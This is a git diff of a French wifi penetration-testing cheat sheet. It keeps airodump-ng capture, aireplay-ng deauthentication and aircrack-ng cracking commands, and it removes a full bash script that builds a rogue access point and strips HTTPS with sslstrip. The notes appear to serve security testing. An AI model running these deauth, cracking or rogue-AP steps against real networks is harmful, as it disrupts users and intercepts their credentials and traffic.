3232| Modes | Managed, Master, Master |
3333| Frequency | 2.4GHz ou 5GHz |
3434
35-
3635## Modulation
3736
3837ASK, FSK, PSK
@@ -69,7 +68,6 @@ FHSS : Frequency Hopping Spread Spectrum
6968| IEEE 802.11ay| 60 GHz | 20 Gbps | ~ 300 m (outdoor)| 2021 |
7069| IEEE 802.11be| 2.4 GHz / 5 GHz / 6 GHz | 23 Gbps | ~ 300 m (outdoor)| 2024 |
7170
72-
7371## Canaux
7472
7573Connaitre le lien canal-fréquence permet d'utiliser des outils software defined radio (SDR) en complément des cartes wifi. Cela permet de détecter et trianguler les points d'accès malveillants.
@@ -161,7 +159,7 @@ iwconfig wlan0 mode monitor
161159fconfig wlan0 up
162160```
163161
164- Debug en cas d'utilisation de la carte qui empêche le passe en mode monitor :
162+ Debug en cas d'utilisation de la carte qui empêche le passe en mode monitor :
165163
166164``` sh
167165nmcli nm wifi off
@@ -191,7 +189,7 @@ Le binaire se trouve dans `C:\Windows\System32\Npcap`
191189.\WlanHelper.exe "wi-fi" mode monitor
192190```
193191
194- à défaut d'une carte et de drivers compatibles, il faudra se contenter d'une énumération sommaire
192+ à défaut d'une carte et de drivers compatibles, il faudra se contenter d'une énumération sommaire
195193
196194> [ !TIP]
197195> se déconnecter de son AP wifi pour lister l'ensemble des réseaux
@@ -244,13 +242,13 @@ airodump-ng --essid <nom AP> -c <channel> -w capture-file wlan1
244242airodump-ng --bssid < mac AP> -c < channel> -w capture-file wlan1
245243```
246244
247- ### deauth (broadcast):
245+ ### deauth (broadcast)
248246
249247``` sh
250248sudo aireplay-ng --deauth 30 -a < mac AP> wlan1
251249```
252250
253- ### deauth ciblée:
251+ ### deauth ciblée
254252
255253``` sh
256254sudo aireplay-ng --deauth 30 -a < mac AP> -c < mac Client> wlan1
@@ -262,96 +260,9 @@ sudo aireplay-ng --deauth 30 -a <mac AP> -c <mac Client> wlan1
262260aircrack-ng.exe -w wordlist.txt file.cap
263261```
264262
265- ### Script pour un rogue access point
266-
267- ``` sh
268- function AP1 {
269-
270- # creation d'un Access Point
271- echo -e " /!\ KALI MUST BE SET IN AIRPLANE MODE/WIFI DISABLED BEFORE.\nthe nat configuration of iptables is not flush for do that: iptables -t nat -D PREROUTING 1 "
272- echo -e " syntax: AP1 <bssid/mac> <essid/APname> <canal> <iface>"
273- ifconfig $4 down
274- iwconfig $4 mode monitor
275- rfkill unblock wlan
276- airbase-ng -a $1 -c $3 --essid $2 $4
277- }
278- export -f AP1
279-
280- function AP2 {
281-
282- # creation d'un access point + acces internet
283- echo -e " syntax: AP2 <bssid/mac> <essid/APname> <canal> <Wifi-Iface> <redirection-iface>"
284- # creation de l'ap en arriere plan:
285- AP1 $1 $2 $3 $4 &
286- echo " please wait 10..."
287- sleep 10
288- # flush d'iptable et redirection de port:
289- iptables -F && iptables -X
290- iptables -P FORWARD ACCEPT
291- iptables -P INPUT ACCEPT
292- iptables -P OUTPUT ACCEPT
293- iptables -t nat -A POSTROUTING -o $5 -j MASQUERADE
294- # kernel fowarding
295- echo 1 > /proc/sys/net/ipv4/ip_forward
296-
297- # configuration du rogue AP: puissance, ip, routage DHCP
298- iwconfig wlan0 txpower 30
299- ifconfig at0 10.0.0.1 netmask 255.255.255.0
300- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
301-
302- echo -e " default-lease-time 600;\nmax-lease-time 7200;\nsubnet 10.0.0.0 netmask 255.255.255.0 {\nrange 10.0.0.10 10.0.0.15;\noption subnet-mask 255.255.255.0;\noption broadcast-address 10.0.0.255;\noption routers 10.0.0.1;\noption domain-name-servers 8.8.8.8;\noption domain-name \" local\" ;\n}" > /etc/dhcp/dhcpd.conf
303-
304- echo -e " INTERFACESv4=\" at0\" \nINTERFACESv6=\"\" " > /etc/default/isc-dhcp-server
305- service isc-dhcp-server restart
306- echo " Enjoy!"
307- }
308- export -f AP2
309-
310- function AP3 {
311-
312- # creation d'un access point + acces internet + proxy
313- echo -e " syntax: AP3 <bssid/mac> <essid/APname> <canal> <Wifi-Iface> <redirection-iface>"
314- # creation de l'ap en arriere plan:
315- AP1 $1 $2 $3 $4 &
316- echo " lease wait 10..."
317- sleep 10
318- # flush d'iptable et redirection de port:
319- iptables -F && iptables -X
320- iptables -P FORWARD ACCEPT
321- iptables -P INPUT ACCEPT
322- iptables -P OUTPUT ACCEPT
323- iptables -t nat -A POSTROUTING -o $5 -j MASQUERADE
324- # kernel fowarding
325- echo 1 > /proc/sys/net/ipv4/ip_forward
326-
327- # configuration du rogue AP: puissance, ip, routage DHCP
328- iwconfig wlan0 txpower 30
329- ifconfig at0 10.0.0.1 netmask 255.255.255.0
330- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
331-
332- echo -e " default-lease-time 600;\nmax-lease-time 7200;\nsubnet 10.0.0.0 netmask 255.255.255.0 {\nrange 10.0.0.10 10.0.0.15;\noption subnet-mask 255.255.255.0;\noption broadcast-address 10.0.0.255;\noption routers 10.0.0.1;\noption domain-name-servers 8.8.8.8;\noption domain-name \" local\" ;\n}" > /etc/dhcp/dhcpd.conf
333-
334- echo -e " INTERFACESv4=\" at0\" \nINTERFACESv6=\"\" " > /etc/default/isc-dhcp-server
335- service isc-dhcp-server restart
336-
337- # mise en place du prooxy:
338- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
339- iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 10000
340- # Attaque par desauthentification:
341- aireplay-ng -0 15 -a $1 $4
342- sslstrip standard:
343- sslstrip -l 10000 -w ./sslstrip_log
344- sslstrip2/Leonardo
345- /root/Documents/Projets/RogueAP/sslstrip2-master/sslstrip.py -l 10000 -w ./leonardo.log
346- # }
347- export -f AP3
348-
349- function ap { AP2 00:01:C7:4E:15:0D $1 6 $2 $3 ; }
350- export -f ap
351- function rogue { AP3 00:01:C7:4E:15:0D $1 6 $2 $3 ; }
352- export -f rogue
353- ` ` `
263+ ### Rogue AP tools
354264
265+ * [ wifipumpkin3] ( https://github.com/P0cL4bs/wifipumpkin3 )
355266
356267## Antenne Wifi directionnelle
357268
@@ -361,24 +272,20 @@ export -f rogue
3612722 . le + est isolé et dépasse au milieu de la boite
362273
363274``` txt
364- H: 100 mm
365- L: 175 mm
366- ___________________________________________
367- |
368- |
369- |
370- |
371- | |
372- | <44 mm> | Picot + de 31 mm
373- |__________ | _____________________________
374- ||
375- -+
376- || câble ant.
377-
378-
275+ L : 175 mm (Largeur du réflecteur)
276+ ┌───────────────────────────────────────────────┐
277+ │ │
278+ │ │ H : 100 mm
279+ │ (Point focal / Élément actif) │ (Hauteur)
280+ │ ▲ │
281+ │ │ 31 mm (Picot/Radiateur) │
282+ │ │ │
283+ │ < 44 mm > ┴ │
284+ └─────────────┬─────────────────────────────────┘
285+ │
286+ ▼ Câble Coaxial (RG-58 / LMR-195)
379287```
380288
381-
382289## PINEAPPLE MARK VII
383290
384291une fois branché: ` http://172.16.42.1:1471/#/Login `
0 commit comments